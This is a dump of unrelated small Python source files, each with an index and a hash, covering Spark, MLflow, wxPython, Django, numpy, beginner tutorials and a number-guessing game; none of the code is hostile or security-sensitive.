    return data_dict
def modify_model_priors(model_priors, model_prior, tag, prefix):
    """Apply 'a:b:...:value' override strings to a nested prior dict.

    Each entry of *model_prior* is split on ':'; every element but the
    last forms the key path into *model_priors*, and the last element is
    the new value (kept as a string — no numeric conversion happens here).

    NOTE(review): *prefix* is a local str, so the `prefix += ...` updates
    guarded by *tag* are lost when the function returns — only the
    modified *model_priors* escapes.  Confirm whether callers need the
    accumulated prefix back.
    """
    for mp in model_prior:
        mp_nest = mp.split(":")
        mp_path, mp_val = mp_nest[:-1], mp_nest[-1]
        model_priors = set_nested_item(model_priors, mp_path, mp_val)
        if tag:
            prefix += f"_{mp}"
    return model_priors
|
22,443 | e9a6577000a4929dfc0d2c6412a058ee95c6c185 | import sys
from pyspark import SparkContext, SparkConf
# Spark driver setup: run locally with job name "sort".
conf = SparkConf().setMaster("local").setAppName("sort")
sc = SparkContext(conf = conf)
# Input file path comes from the first CLI argument.
lines = sc.textFile(sys.argv[1])
# Split comma-separated tokens and drop empties; cache for reuse.
word = lines.flatMap(lambda x : x.split(", ")).filter(lambda x: x!='').cache()
# Pair each number with a count of 1 (the count is unused below).
count = word.map(lambda x: (int(x), 1)).cache()
# Sort numerically by key.
sortedCount = count.sortByKey().cache()
# Print the sorted numbers, one per line.
for(num, unitcount) in sortedCount.collect():
    print(num)
sc.stop()
|
22,444 | bfb35a09eabaa7e7465489739714d56f2052a334 | import decimal
# Data Type
x = 2
y = 0.1
flag = False
c = 'a'
foo = 'foo'
print(type(x))
print(type(y))
print(type(flag))
print(type(True))
print(type(c))
print(type(foo))
print(type([]))
print(x.__class__)
print(1 == True)
print(True + True)
# Decimal
print(2 - 1.8)
print(decimal.Decimal('2') - decimal.Decimal('1.8'))
# Type Conversion
print(type(str(10)))
print(type(int('1')))
# Type Inference
if isinstance(foo, str):
print('foo is a String')
|
22,445 | 933417c3e68f617829ff0d56e8cc95271a822dcc | from collections import namedtuple
from typing import Optional, Union, Dict, List
import mlflow
import pandas as pd
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV, cross_val_predict, train_test_split
from config import settings
from process_and_ml.ml_flow_control import create_experiment
from process_and_ml.models import compute_metrics
from process_and_ml.pipeline import preprocessing_baseline, cat_features_fill_na, show_metrics_baseline
from pathlib import Path
path = (
Path('.') if Path('.').resolve().name == 'arvato_project'
else Path('..')
)
path_mlflow = path / 'mlruns'
mlflow.set_tracking_uri(str(path_mlflow))
Features = namedtuple('Features', 'X_train X_test X_valid')
Labels = namedtuple('Labels', 'y_train y_test y_valid')
def evaluate(label, trained_model, pred=None):
    """Score *trained_model* on *pred* against the true *label*.

    Args:
        label: ground-truth binary target values.
        trained_model: fitted classifier exposing predict / predict_proba.
        pred: feature matrix to score.

    Returns:
        Tuple of (positive-class probabilities, ROC-AUC, hard predictions).
    """
    prediction = trained_model.predict_proba(pred)
    acc = trained_model.predict(pred)
    # predict_proba returns an (n_samples, n_classes) array; column 1 is
    # the positive-class probability.  The original sliced ROWS ([:1]),
    # handing a single row to roc_auc_score instead of the full column.
    roc_pred = roc_auc_score(label, prediction[:, 1])
    print(f'Prediction accuracy = {acc}')
    print(f'Prediction roc = {roc_pred} !')
    return prediction[:, 1], roc_pred, acc
def log_best(run: mlflow.entities.Run,
             metric: str) -> None:
    """Log the best parameters from optimization to the parent experiment.

    Args:
        run: current run to log metrics
        metric: name of metric to select best and log
    """
    client = mlflow.tracking.MlflowClient()
    query = "tags.mlflow.parentRunId = '{run_id}' ".format(run_id=run.info.run_id)
    child_runs = client.search_runs([run.info.experiment_id], query)
    # Avoid shadowing the `run` parameter inside the key function.
    best_run = min(child_runs, key=lambda child: child.data.metrics[metric])
    mlflow.set_tag("best_run", best_run.info.run_id)
    mlflow.log_metric(f"best_{metric}", best_run.data.metrics[metric])
def update_weights(x, y, d19):
    # Placeholder — intentionally unimplemented.  TODO: define the
    # re-weighting scheme for (x, y) using the d19 data before callers
    # rely on this.
    ...
class CatPipeline:
    """Training pipeline over a labelled DataFrame.

    Derives categorical features, splits the data into train/test/valid,
    computes class weights and logs training runs to MLflow.
    """
    def __init__(self, df: pd.DataFrame, label: bool):
        self.df = df
        self.label = label
        self.features = None          # Features namedtuple after preprocessing
        self.labels = None            # Labels namedtuple after preprocessing
        self.model = None
        self.class_weights = None
        self.X_train = None
        self.X_valid = None
        self.y_train = None
        self.y_valid = None
        self.X_test = None
        self.y_test = None
        self.cat_features = None
        self.metrics_returned = None
        self.non_wrangler_sequence(df)
    def non_wrangler_sequence(self, df: pd.DataFrame):
        """Derive categorical columns, preprocess/split df and set weights."""
        self.cat_features = df.select_dtypes(include=['category', 'object']).columns
        self.features, self.labels = preprocessing_baseline(df,
                                                           cat_features=self.cat_features,
                                                           target='is_customer')
        self.X_train, self.X_test, self.X_valid = self.features
        self.y_train, self.y_test, self.y_valid = self.labels
        # Weight the positive class by the negative/positive ratio.
        self.class_weights = (1, sum(self.y_train == 0) / sum(self.y_train == 1))
    def predict_test(self, test_df: pd.DataFrame):
        """Clean a raw test frame and score it.

        NOTE(review): this calls evaluate(lnr, test_df_cleaned), so the
        LNR ids land in evaluate's `label` slot and the cleaned frame in
        `trained_model` with pred=None — that does not match evaluate's
        (label, trained_model, pred) signature.  Confirm intent.
        """
        lnr = test_df['LNR']
        test_df_cleaned = cat_features_fill_na(test_df.drop(columns=['LNR'], errors='ignore'),
                                               cat_features=self.cat_features)
        return evaluate(lnr, test_df_cleaned)
    def train(self, model, params, tags, run_name: Optional[str], experiment_name: str):
        """Fit model(**params) with the validation eval set; log to MLflow."""
        self.model = model(**params)
        experiment_id = create_experiment(experiment_name=experiment_name)
        with mlflow.start_run(tags=tags, run_name=run_name, experiment_id=experiment_id):
            mlflow.log_params(params)
            self.model.fit(self.X_train, self.y_train, eval_set=(self.X_valid, self.y_valid), verbose=False)
            self.metrics_returned = show_metrics_baseline(self.model, features=self.features, labels=self.labels)
            mlflow.log_metrics(self.metrics_returned)
class TrainAfterPipeline:
    """Train and evaluate models on an already-preprocessed array + labels."""
    def __init__(self, dataset: np.array, label: np.array):
        # NOTE(review): `label.values` below implies *label* is a pandas
        # Series rather than a bare ndarray — confirm against callers.
        self.dataset = dataset
        self.label = label
        self.trained_model = False
        self.X_train = None
        self.y_train = None
        self.X_test = None
        self.y_test = None
        # 70/30 split with a fixed random state for reproducibility.
        self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.dataset, self.label.values,
                                                                                random_state=settings.RANDOM_STATE,
                                                                                test_size=0.3)
    def train_grid_search(self, model, grid: Dict[str, Union[str, float, List[Union[str, int, float]]]]):
        """Exhaustive ROC-AUC grid search with repeated stratified 20-fold CV."""
        cv = RepeatedStratifiedKFold(n_splits=20, n_repeats=3, random_state=settings.RANDOM_STATE)
        grid_search = GridSearchCV(estimator=model, param_grid=grid, n_jobs=-1, cv=cv, scoring='roc_auc', verbose=2)
        grid_result = grid_search.fit(self.X_train, self.y_train)
        print(grid_result.best_score_)
        print(grid_result.best_estimator_)
        compute_metrics(grid_result.best_estimator_, self.X_test, self.y_test)
        return grid_result
    def train(self, model, params, tags, run_name: Optional[str], experiment_name: str, data: Optional[Dict[str, np.array]]=None):
        """Fit one model (optionally on caller-supplied data) and log metrics.

        When *data* is given it must map 'x' and 'y' to training arrays;
        otherwise the pipeline's own train split is used.  Returns the
        fitted model.
        """
        model = model(**params)
        experiment_id = create_experiment(experiment_name=experiment_name)
        if not data:
            x = self.X_train
            y = self.y_train
        else:
            x = data['x']
            y = data['y']
        with mlflow.start_run(tags=tags, run_name=run_name, experiment_id=experiment_id):
            mlflow.log_params(params)
            model.fit(x, y)
            # Test-split metrics are logged regardless of the data source.
            split_acc, split_auc = compute_metrics(model, self.X_test, self.y_test)
            mlflow.log_metrics({'acc': split_acc, 'auc': split_auc})
            return model
|
22,446 | dd3beae2288b6ab0d2a8d9c50ca90fd4e995bf6c | import datetime
import os
import sys
import types
import config.settings
# create config object corresponding to specified env
ENV = os.environ.get('ENV', 'Base')
_current = getattr(sys.modules['config.settings'], '{0}Config'.format(ENV))()
def set_attrs():
    """Copy every public attribute of the active settings object onto this
    module, letting environment variables override individual values.

    NOTE(review): os.environ values are always strings, so an override
    silently changes the attribute's type — confirm consumers cope.
    """
    # copy attributes to the module for convenience
    for atr in [f for f in dir(_current) if '__' not in f]:
        # environment can override anything
        val = os.environ.get(atr, getattr(_current, atr))
        setattr(sys.modules[__name__], atr, val)
# Populate the module attributes immediately on import.
set_attrs()
def as_dict():
    """Return the current configuration as a plain dict of public values.

    NOTE(review): iterates `config` — the package name bound by the
    `import config.settings` at the top of this file — so this assumes
    the attributes written by set_attrs() live on that package (i.e. this
    file is config/__init__.py).  Confirm against the project layout.
    """
    res = {}
    for atr in [f for f in dir(config) if (('__' not in f) and (not f.startswith('_')))]:
        val = getattr(config, atr)
        # Skip modules and functions; keep only plain config values.
        if all(map(lambda x: not isinstance(val, x), [types.ModuleType, types.FunctionType])):
            res[atr] = val
    return res
|
22,447 | 2ef6e862e868fab8e364f18c755cc3c66e79181e | import os
import sentry_sdk
def setup_sentry():
    """Initialise the Sentry SDK with the DSN from the SENTRY_DSN env var."""
    dsn = os.getenv('SENTRY_DSN')
    sentry_sdk.init(dsn)
|
22,448 | 0a9669e7dfa24fe0cd1259361ec7da0fcc7f9b6f | import numpy as np
# 4x3 matrix and a length-3 vector: NumPy broadcasting stretches `b`
# across each row of `a` for the element-wise operations below.
a=np.array([[0.0,0.0,0.0],[10.0,10.0,10.0],[20.0,20.0,20.0],[30.0,30.0,30.0]])
b=np.array([1.0,2.0,3.0])
print("first array ",a)
print("seconda array",b)
print(a+b)
print(a-b)
print(a*b)
print(a/b)
|
22,449 | a72ea9c7118e68d9202333bc29dd6c629bcbd946 | 1 迭代器
什么是可迭代对象(Iterable)?
可以直接作用于for循环的对象统称为可迭代对象,即Iterable。
# 一是集合数据类型,如list、tuple、dict、set、str等;
# 二是generator,包括生成器和带yield的generator function。
什么又是迭代器(Iterator)?
可以被next()函数调用并不断返回下一个值(直到没有数据时抛出StopIteration错误)的对象称为迭代器,即Iterator。
Python的Iterator对象表示的是一个数据流,Iterator对象可以被next()函数调用并不断返回下一个数据,直到没有数据时抛出StopIteration错误。
# 可以把这个数据流看做是一个有序序列,但我们却不能提前知道序列的长度,只能不断通过next()函数实现按需计算下一个数据,
# 所以Iterator的计算是惰性的,只有在需要返回下一个数据时它才会计算。
# Iterable 可以通过iter()函数转换得到 Iterator
2 生成器
generator 就是 iterator 的一种,以更优雅的方式实现的 iterator 。
3 装饰器
什么是装饰器(Decorator)?
本质上:是一个返回函数的高阶函数。
生产上,什么时候用装饰器?
当我们想要给一个函数func()增加某些功能,但又不希望修改func()函数的源代码的时候就需要用装饰器了。(在代码运行期间动态增加功能)
装饰器例子:
[root@svn py]# cat zsq.py
#!/bin/env python
#coding:utf-8
import functools ### 函数工具模块
def login(func):
"""
在这里新定义一个高阶函数,
这就是decorator
"""
@functools.wraps(func) ### Python内置的functools.wraps()使 带有装饰器的函数的name属性保持不变
def wrapper(*args, **kwargs):
user = "hzq" ### 假设这是数据库中的用户名和密码
passwd = "123"
username = raw_input("输入用户名:")
password = raw_input("输入密码:")
if username == user and password == passwd:
            return func(*args, **kwargs) ### 此处返回home(),因为对于任意函数,都可以通过类似func(*args,**kw)的形式调用它,无论它的参数是如何定义的。
        else:
            print("用户名或密码错误。")
return wrapper
@login ### 利用python的@语法,把decorator置于home函数的定义处 相当于home = login(home)
def home():
print("欢迎来到XX首页!")
home()
print(home.__name__) ### 不使用functools.wraps()时,home的__name__属性变为了wrapper,使用后仍为home
|
22,450 | aeb1775f49957146e6f829a85ab706a585f8acd0 | /Users/hirata/anaconda3/lib/python3.6/tokenize.py |
22,451 | d7811002457ed9d46a470e6e78f15be5a16e1049 | #!/usr/bin/env python
# encoding: utf-8
import wx
import wx.lib.scrolledpanel as scrolled
from constants import *
import QLiveLib
from Widgets import TransportButtons, CueButton, QLiveControlKnob
class SetInterpTimeDialog(wx.Dialog):
    """Small modal dialog with a knob for choosing an interpolation time.

    "set All" reads the knob value (eventually broadcast to all tracks)
    and closes the dialog.
    """
    def __init__(self):
        wx.Dialog.__init__(self, None, size = (200, 120))
        panel = wx.Panel(self)
        # Keep the knob on self: onSetAll must read it after __init__
        # returns (the original stored it in a local, so the handler
        # raised NameError on the bare `knob`).
        self.knob = QLiveControlKnob(self, 0.01, 300, pos = (5,5))
        button = wx.Button(self,label="set All" , pos = (60, 65))
        button.Bind(wx.EVT_BUTTON, self.onSetAll)
    def onSetAll(self, e):
        """Read the knob value and close; broadcast is still TODO."""
        value = self.knob.GetValue()
        if QLiveLib.getVar("MainWindow") != None:
            pass
            # QLiveLib.getVar("FxTracks").cueEvent(value)
        self.Close()
class CueEvent:
    """Plain record describing a cue change.

    Carries the event type (a CUE_TYPE_* constant), the newly selected
    cue index, the previous index (may be None) and the total cue count.
    """

    def __init__(self, type, current, old, total):
        self.type, self.current = type, current
        self.old, self.total = old, total

    def getType(self):
        """Return the cue event type constant."""
        return self.type

    def getCurrent(self):
        """Return the index of the newly selected cue."""
        return self.current

    def getOld(self):
        """Return the previously selected cue index (or None)."""
        return self.old

    def getTotal(self):
        """Return the total number of cues."""
        return self.total
class ControlPanel(wx.Panel):
    """Left-hand control strip: transport buttons plus cue add/delete and
    up/down navigation, with MIDI-learn on the up/down buttons."""
    def __init__(self, parent):
        wx.Panel.__init__(self, parent, size=(95, -1), style=wx.SUNKEN_BORDER)
        self.mainSizer = wx.BoxSizer(wx.VERTICAL)
        self.newAddSizer = wx.BoxSizer(wx.HORIZONTAL)
        self.upDownSizer = wx.BoxSizer(wx.HORIZONTAL)
        # Button currently in MIDI-learn mode (None when learning is off).
        self.learnButton = None
        self.buttons = TransportButtons(self,
                            playCallback=QLiveLib.getVar("AudioServer").start,
                            recordCallback=QLiveLib.getVar("AudioServer").record)
        self.mainSizer.Add(self.buttons, 0, wx.ALIGN_CENTER_HORIZONTAL)
        self.mainSizer.Add(wx.StaticLine(self, size=(1, 1)), 0,
                           wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, 5)
        title = wx.StaticText(self, label="-- CUES --")
        self.mainSizer.Add(title, 0, wx.ALIGN_CENTER, 5)
        #button = wx.Button(self,wx.ID_OK, label="Interp Time" )
        #self.mainSizer.Add(button, 0, wx.ALIGN_CENTER, 5)
        #button.Bind(wx.EVT_BUTTON, self.onSetInterpTime)
        # Add / delete cue buttons.
        bmp = wx.Bitmap(ICON_ADD, wx.BITMAP_TYPE_PNG)
        self.newButton = wx.BitmapButton(self, wx.ID_ANY, bmp)
        self.newButton.Bind(wx.EVT_BUTTON, self.onNewCue)
        self.newAddSizer.Add(self.newButton, 1)
        bmp = wx.Bitmap(ICON_DELETE, wx.BITMAP_TYPE_PNG)
        self.delButton = wx.BitmapButton(self, wx.ID_ANY, bmp)
        self.delButton.Bind(wx.EVT_BUTTON, self.onDelCue)
        self.newAddSizer.Add(self.delButton, 1)
        self.mainSizer.Add(self.newAddSizer, 0, wx.EXPAND|wx.ALL, 5)
        # Up/down cue navigation; the *_MIDI bitmaps mark learn mode.
        self.upbmp = wx.Bitmap(ICON_ARROW_UP, wx.BITMAP_TYPE_PNG)
        self.upmidbmp = wx.Bitmap(ICON_ARROW_UP_MIDI, wx.BITMAP_TYPE_PNG)
        self.upButton = wx.BitmapButton(self, wx.ID_ANY, self.upbmp)
        self.upButton.Bind(wx.EVT_BUTTON, self.onMoveCueUp)
        self.upButton.Bind(wx.EVT_RIGHT_DOWN, self.midiLearn)
        self.upTooltip = wx.ToolTip("")
        self.upButton.SetToolTip(self.upTooltip)
        self.upDownSizer.Add(self.upButton, 1)
        self.downbmp = wx.Bitmap(ICON_ARROW_DOWN, wx.BITMAP_TYPE_PNG)
        self.downmidbmp = wx.Bitmap(ICON_ARROW_DOWN_MIDI, wx.BITMAP_TYPE_PNG)
        self.downButton = wx.BitmapButton(self, wx.ID_ANY, self.downbmp)
        self.downButton.Bind(wx.EVT_BUTTON, self.onMoveCueDown)
        self.downButton.Bind(wx.EVT_RIGHT_DOWN, self.midiLearn)
        self.downTooltip = wx.ToolTip("")
        self.downButton.SetToolTip(self.downTooltip)
        self.upDownSizer.Add(self.downButton, 1)
        self.mainSizer.Add(self.upDownSizer, 0,
                           wx.EXPAND|wx.LEFT|wx.RIGHT|wx.BOTTOM, 5)
        self.SetSizerAndFit(self.mainSizer)
    def onDelCue(self, evt):
        """Forward the delete-cue click to the CuesPanel."""
        QLiveLib.getVar("CuesPanel").onDelCue()
    def onNewCue(self, evt):
        """Forward the new-cue click to the CuesPanel."""
        QLiveLib.getVar("CuesPanel").onNewCue()
    def onMoveCueUp(self, evt):
        """Forward the up-arrow click to the CuesPanel."""
        QLiveLib.getVar("CuesPanel").onMoveCueUp()
    def onMoveCueDown(self, evt):
        """Forward the down-arrow click to the CuesPanel."""
        QLiveLib.getVar("CuesPanel").onMoveCueDown()
    def moveCueFromMidi(self, which):
        """Move the cue selection from a MIDI event ('up' or 'down')."""
        if which == "up":
            wx.CallAfter(QLiveLib.getVar("CuesPanel").onMoveCueUp)
        elif which == "down":
            wx.CallAfter(QLiveLib.getVar("CuesPanel").onMoveCueDown)
    def midiLearn(self, evt):
        """Toggle MIDI-learn mode on the right-clicked up/down button.

        Only one button may be learning at a time; the previously
        learning button (if any) is restored to its normal bitmap.
        """
        obj = evt.GetEventObject()
        if self.learnButton is not None and self.learnButton != obj:
            if self.learnButton == self.upButton:
                wx.CallAfter(self.learnButton.SetBitmapLabel, self.upbmp)
            elif self.learnButton == self.downButton:
                wx.CallAfter(self.learnButton.SetBitmapLabel, self.downbmp)
        server = QLiveLib.getVar("AudioServer")
        if self.learnButton == obj:
            # Second right-click on the same button: cancel learning.
            if obj == self.upButton:
                obj.SetBitmapLabel(self.upbmp)
            elif obj == self.downButton:
                obj.SetBitmapLabel(self.downbmp)
            self.learnButton = None
            server.stopCueMidiLearn()
        else:
            if obj == self.upButton:
                obj.SetBitmapLabel(self.upmidbmp)
            elif obj == self.downButton:
                obj.SetBitmapLabel(self.downmidbmp)
            self.learnButton = obj
            if obj == self.upButton:
                which = "up"
            elif obj == self.downButton:
                which = "down"
            server.setCueMidiLearnState(which)
            server.startCueMidiLearn()
    def setButtonTooltip(self, which, tip):
        """Set the tooltip text of the 'up' or 'down' button."""
        if which == "up":
            self.upTooltip.SetTip(tip)
        elif which == "down":
            self.downTooltip.SetTip(tip)
    def resetCueButtonBackgroundColour(self):
        """Leave MIDI-learn mode and restore the learning button's bitmap."""
        if self.learnButton is not None:
            if self.learnButton == self.upButton:
                wx.CallAfter(self.learnButton.SetBitmapLabel, self.upbmp)
            elif self.learnButton == self.downButton:
                wx.CallAfter(self.learnButton.SetBitmapLabel, self.downbmp)
            self.learnButton = None
    def onSetInterpTime(self, e):
        """Open the modal interpolation-time dialog (currently unused)."""
        panel = SetInterpTimeDialog()
        panel.ShowModal()
class CuesPanel(scrolled.ScrolledPanel):
    """Scrolling column of cue buttons; owns the current cue selection and
    broadcasts CueEvent objects to the tracks and soundfile views."""
    def __init__(self, parent=None, size=(95, 500)):
        scrolled.ScrolledPanel.__init__(self, parent, size=size, style=wx.SUNKEN_BORDER)
        self.currentCue = 0
        self.cueButtons = []
        self.mainSizer = wx.BoxSizer(wx.VERTICAL)
        self.SetSizer(self.mainSizer)
        # A session always starts with one cue.
        self.appendCueButton()
    def setSelectedCue(self, number):
        """Select cue *number* if it exists; returns True on success."""
        if number >= 0 and number < len(self.cueButtons):
            if self.currentCue < len(self.cueButtons):
                self.cueButtons[self.currentCue].select(False)
            self.cueButtons[number].select(True)
            self.currentCue = number
            self.SetupScrolling(scroll_x=False, scroll_y=True, scrollToTop=False)
            self.mainSizer.Layout()
            self.ScrollChildIntoView(self.cueButtons[self.currentCue])
            return True
        else:
            return False
    def clearButtons(self):
        """Destroy every cue button and empty the list."""
        for button in self.cueButtons:
            self.mainSizer.Remove(button)
            button.Destroy()
        self.cueButtons = []
        self.mainSizer.Layout()
    def appendCueButton(self):
        """Create one new cue button at the end and select it."""
        number = len(self.cueButtons)
        butHeight = self.GetTextExtent("9")[1] + 8
        but = CueButton(self, size=(50, butHeight), number=number,
                        evtHandler=self.onCueSelection)
        self.mainSizer.Add(but, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 5)
        self.cueButtons.append(but)
        self.setSelectedCue(number)
    def sendCueEvent(self, evt):
        """Broadcast *evt* to the tracks and soundfile panels (if any UI)."""
        if QLiveLib.getVar("MainWindow") != None:
            QLiveLib.getVar("FxTracks").cueEvent(evt)
            QLiveLib.getVar("Soundfiles").cueEvent(evt)
    def onCueSelection(self, x):
        """Handle a click on cue button *x*: select it and broadcast."""
        old = self.currentCue
        if self.setSelectedCue(x):
            evt = CueEvent(type=CUE_TYPE_SELECT, current=self.currentCue,
                           old=old, total=len(self.cueButtons))
            self.sendCueEvent(evt)
    def loadCurrentCue(self):
        """Re-broadcast the current cue (used after loading a project)."""
        evt = CueEvent(type=CUE_TYPE_SELECT, current=self.currentCue,
                       old=None, total=len(self.cueButtons))
        self.sendCueEvent(evt)
    def onDelCue(self):
        """Delete the current cue, renumber the rest and select a neighbour."""
        button = self.cueButtons.pop(self.currentCue)
        button.Destroy()
        self.mainSizer.Layout()
        # Never allow zero cues: recreate one if the last was deleted.
        if len(self.cueButtons) == 0:
            self.appendCueButton()
        for i, but in enumerate(self.cueButtons):
            but.setNumber(i)
        deletedCue = self.currentCue
        if self.currentCue > 0:
            selection = self.currentCue - 1
        else:
            selection = 0
        if self.setSelectedCue(selection):
            evt = CueEvent(type=CUE_TYPE_DELETE, current=self.currentCue,
                           old=deletedCue, total=len(self.cueButtons))
            self.sendCueEvent(evt)
    def onSaveCue(self):
        """Broadcast a save event for the current cue."""
        evt = CueEvent(type=CUE_TYPE_SAVE, current=self.currentCue,
                       old=None, total=len(self.cueButtons))
        self.sendCueEvent(evt)
    def onNewCue(self):
        """Append a new cue (which becomes current) and broadcast it."""
        old = self.currentCue
        self.appendCueButton()
        evt = CueEvent(type=CUE_TYPE_NEW, current=self.currentCue,
                       old=old, total=len(self.cueButtons))
        self.sendCueEvent(evt)
    def getNumberOfCues(self):
        """Return the total number of cues."""
        return len(self.cueButtons)
    def getCurrentCue(self):
        """Return the index of the currently selected cue."""
        return self.currentCue
    def onMoveCueUp(self):
        """Select the previous cue (no-op at the first cue)."""
        self.onCueSelection(self.currentCue - 1)
    def onMoveCueDown(self):
        """Select the next cue (no-op at the last cue)."""
        self.onCueSelection(self.currentCue + 1)
    def setSaveDict(self, dict):
        """Rebuild the cue buttons from a saved project dictionary."""
        self.clearButtons()
        for i in range(dict["numberOfCues"]):
            self.appendCueButton()
        self.setSelectedCue(0)
    def getSaveDict(self):
        """Return the panel's state as a serialisable dictionary."""
        dict = {}
        dict["numberOfCues"] = len(self.cueButtons)
        return dict
|
22,452 | e4de5a62e1097c20338959ec0b6dcc212f89200f | from django.db import models
from post.utils import unique_slug_generator
from django.db.models.signals import pre_save
class Tag(models.Model):
    """A content tag; `slug` is auto-filled from `title` by the pre_save
    hook registered below the class."""
    title=models.CharField(max_length=150)
    slug=models.SlugField(blank=True)
    date=models.DateTimeField(auto_now_add=True)
    def __str__(self):
        """Display the tag by its title."""
        return self.title
def tag_save(sender, instance, *args, **kwargs):
    """pre_save receiver: generate a unique slug on first save only."""
    if not instance.slug:
        instance.slug = unique_slug_generator(instance)
# Fill the slug automatically before any Tag instance is written.
pre_save.connect(tag_save,sender=Tag)
22,453 | 622e1e82fd8ce9298f3312fe1b205785dcb468f4 | import math
import random
from sqlalchemy.orm.collections import mapped_collection
from .maps import Map
from .foods import Food
from .pheromones import Pheromone
from .templates import db, GameState
import pdb
class World(GameState):
    """The world object which controls the game states for a player."""
    colonies = db.relationship('Colony', backref='world')
    """All colonies ('players') which exist in this world."""
    ants = db.relationship('Ant', backref='world')
    """All ants that exist in this world."""
    foods = db.relationship('Food', backref='world')
    """All foods which exist in this world."""
    age = db.Column(db.Integer)
    """How long this world has been running for."""
    width = db.Column(db.Integer)
    """The horizontal size of the world."""
    height = db.Column(db.Integer)
    """The vertical size of the world."""
    maps = db.relationship('Map', collection_class=mapped_collection(lambda _map: (_map.x, _map.y)), backref='world')
    """The mapping of objects in the world to their coordinates."""
    pheromones = db.relationship('Pheromone',
                                 collection_class=mapped_collection(lambda _pheromone: (_pheromone.colony_id,
                                                                                       _pheromone.x,
                                                                                       _pheromone.y)),
                                 backref='world')
    """The mapping of pheromones in the world to their coordinates."""
    def __init__(self, width=50, height=50):
        """Create a fresh world of the given dimensions at age 0."""
        self.age = 0
        self.width = width
        self.height = height
    def add_object(self, object_to_be_added):
        """Adds the object to this world.

        Args:
            object_to_be_added (Object): The object to be added to the world.

        Returns:
            bool: True when a map entry was created, False when the target
            cell was already occupied.
        """
        new_mapping = Map.add_object(self.id, object_to_be_added)
        if new_mapping:
            object_to_be_added.save()
            new_mapping.ref_id = object_to_be_added.id
            return True
        else:
            return False
    def remove_object(self, object_to_be_removed):
        """Removes the object from this world.

        Args:
            object_to_be_removed (Object): The object to be removed.
        """
        Map.remove_object(object_to_be_removed)
        object_to_be_removed.query.delete()
    def get_object_at_location(self, x, y):
        """Returns the object located at given coordinates.

        Args:
            x (int): X coordinate
            y (int): Y coordinates

        Returns:
            Object: The object located at those coordinates. None if nothing exists there.
        """
        object_map_at_target_location = self.maps.get((x, y))
        if not object_map_at_target_location:
            return None
        return object_map_at_target_location.get_real_object()
    def generate_food(self):
        """Creates a food object randomly somewhere in this world."""
        # NOTE(review): randint is inclusive on both ends, so x/y may equal
        # width/height — confirm whether coordinates are 0..size-1.
        x = random.randint(0, self.width)
        y = random.randint(0, self.height)
        new_food = Food(self.id, x, y)
        food_created = self.add_object(new_food)
        if not food_created:
            # Cell occupied: if it already holds food, grow its value instead.
            existing_object = self.get_object_at_location(x, y)
            if isinstance(existing_object, Food):
                existing_object.value += 1
    def add_pheromone_trail(self, colony_id, old_x, old_y, x, y):
        """Drop or reinforce a 'food-path' pheromone at (x, y).

        The trail direction is the angle from (x, y) back toward
        (old_x, old_y), in degrees.

        NOTE(review): the Pheromone is created with colony id 1 and the
        reinforcement branch also checks `colony_id == 1`, ignoring the
        *colony_id* argument — confirm this is intentional.
        """
        existing_trail = self.pheromones.get((colony_id, x, y))
        if not existing_trail:
            degrees = (math.degrees(math.atan2(old_y - y, old_x - x))) % 360
            new_trail = Pheromone.add_pheromone(self.id, 1, x, y, 'food-path', degrees, 1)
        elif existing_trail.colony_id == 1:
            existing_trail.strength += 1
|
22,454 | 93cf90969d21af641fff4c7e9ab326799aaca9e0 | # Generated by Django 3.2.15 on 2023-06-02 18:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django makemigrations: adds Event.accept_court
    # (bool, default False) and Event.court (FK to judgment.Court,
    # default pk=1).  Avoid hand-editing beyond comments.
    dependencies = [
        ('judgment', '0005_auto_20230602_2004'),
    ]
    operations = [
        migrations.AddField(
            model_name='event',
            name='accept_court',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='event',
            name='court',
            field=models.ForeignKey(default=1, help_text='Select the court where this case was heard.', on_delete=django.db.models.deletion.CASCADE, to='judgment.court'),
        ),
    ]
|
22,455 | 765c943b327a62eb7ff55e76acac8c53485c6e9d | import random
print('The Number Guessing Game')
# Pick the secret number once, then give the player three attempts.
no = random.randint(1, 10)
print('guess a number between 1 to 10')
chances = 0
while chances < 3:
    guess = int(input('enter your guess '))
    if guess == no:
        print('Congratulations! You won')
        break
    elif guess < no:
        print('Please guess a higher number! ', guess)
    else:
        print('Please guess a lower number! ', guess)
    chances = chances + 1
# Only reached with chances == 3 when all attempts were wrong (a win on
# the final attempt breaks out before the counter reaches 3).
if chances == 3:
    # Fixed user-facing typo: "loose" -> "lose".
    print('Sorry you lose')
22,456 | 0f0a9cdbadccddec207030e99d2d12413d9e3d78 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
集合的使用:
Python中的集合跟数学上的集合是一致的,不允许有重复元素,而且可以进行交集、并集、差集等运算。
"""
# 创建集合的字面量语法
set1 = {1, 2, 3, 3, 3, 2}
print(set1)
print('Length = ', len(set1))
# 创建集合的构造器语法(面向对象部分会进行详细讲解)
set2 = set(range(1, 10))
set3 = set((1, 2, 3, 3, 3, 2))
print(set2, set3)
# 创建集合的推导式语法(推导式也可以用于推导集合)
set4 = {num for num in range(1, 100) if num % 3 == 0 or num % 5 == 0}
print(set4)
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 向集合添加元素和从集合删除元素。
set1.add(4)
set1.add(5)
set2.update([11, 12])
print('set2:', set2)
set2.discard(5)
print('set2:', set2)
if 4 in set2:
set2.remove(4)
print('set1:', set1)
print('set2:', set2)
print(set3.pop())
print('set3:', set3)
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 集合的成员交集、并集、差集等运算:
# 交集
print(set1 & set2)
# print(set1.intersection(set2))
# 并集
print(set1 | set2)
# print(set1.union(set2))
# 差集:set1 - 交集
print(set1 - set2)
# print(set1.difference(set2))
# 对称差运算:并集 - 交集
print(set1 ^ set2)
# print(set1.symmetric_difference(set2))
print('-'*100)
print('set1:', set1)
print('set2:', set2)
print('set3:', set3)
# 判断子集和超集
print(set2 <= set1)
# print(set2.issubset(set1))
print(set3 <= set1)
# print(set3.issubset(set1))
print(set1 >= set2)
# print(set1.issuperset(set2))
print(set1 >= set3)
# print(set1.issuperset(set3)) |
